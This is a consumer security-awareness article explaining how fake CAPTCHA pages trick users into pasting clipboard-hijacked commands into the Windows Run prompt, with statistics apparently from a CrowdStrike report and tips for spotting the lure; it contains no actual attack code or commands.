All through 2025, there was one alarming trend in the world of cybercrime, faking CAPTCHAs. These fake CAPTCHAs have caught multiple people off guard and the rate of this attack method has increased exponentially in 2025 alone and it catches people off guard because they don’t pay attention to it normally.
CAPTCHA, or the Completely Automated Public Turing Test, is designed with bots and computers in mind. The idea is simple: some things bots and AI cannot recognize, such as specific phrases, letters, and words. The words are jumbled up and distorted in the classic CAPCHAS now being phased out. Early bots could not figure out the difference or find the correct letters, while humans, able to discern patterns, could thus reveal who’s a bot and who isn’t. Users often encounter CAPTCHA and reCAPTCHA tests on the Internet. Such tests are one way of managing bot activity, although the approach has its drawbacks. In a twist of irony, this process is also automated by the websites running these programs. (1)
In their 2026 annual report, CrowdStrike brings attention to several trends in the world of cybercrime. This data includes:
In that same report, they raised an alarm concern concerning the CAPTCHA system. According to CrowdStrike's report, last year, many cybercriminals moved away from browser-update-related phishing lures toward fake CAPTCHA tactics.
Compared with 2024 security event data, the research team reported a 563% increase in CAPTCHA lures in 2025, compared with browser update lures. The increase is so massive that many hackers have started to retire their browser-based lure systems that had been dominating for years.(3)
The threat vector is very simple in its execution, and it involves lack of interest, muscle memory and social engineering:
1. Malicious Redirect: A web user visits a compromised website and is redirected to another webpage, where they’re presented with a familiar and seemingly harmless CAPTCHA challenge (see Figure 1).
2. JavaScript Clipboard Hijack: Simply by visiting the website, a malicious command is silently copied to the user’s clipboard via JavaScript, without their knowledge.
3. Unusual Run Prompt: Instead of clicking how many traffic lights or bridges they see, the user is instructed to open a Run prompt—a Windows feature for quickly executing commands, opening programs, accessing files—and paste the pre-copied command, unknowingly running the malicious script.
4. Malware Installation: The command leads to the installation of malware, often resulting in credential theft, as login details for systems, applications, and services are harvested and sent to attackers.(4)
The very fact a simple verification that you're not a robot is very worrying to say the least when it comes to protecting your data. As it is, there are a few ways to spot whether or not this is a legitimate one. The first is to check the website URL. When you’re going to the website your searching for and is suddenly redirected to somewhere else, check the URL. If the URL doesn’t match a normal website or the web page doesn’t match up with something like Cloudflare, back up and try to report this to the appropriate administrator.
The other is to ignore the run prompt. No website will force you to run your system prompt just from clicking on their website. If you see an error message telling you to run a malicious link, close out of it immediately. That link they have provided is the code they need to get into your device. If you do post the command, the fact that you put it in wont trigger antivirus to scan and pick it up. In their minds, why waste the effort if you can use their ignorance and apathy against their victims?
CAPTHCAs are designed to ensure that bots are not running to your websites and creates falls clicks. Hackers have unfortunately found a way to use this against many people, going from a new fad to the new common tactic for their attacks. You can counter these with careful observation, vigilance and making sure your websites are legitimate.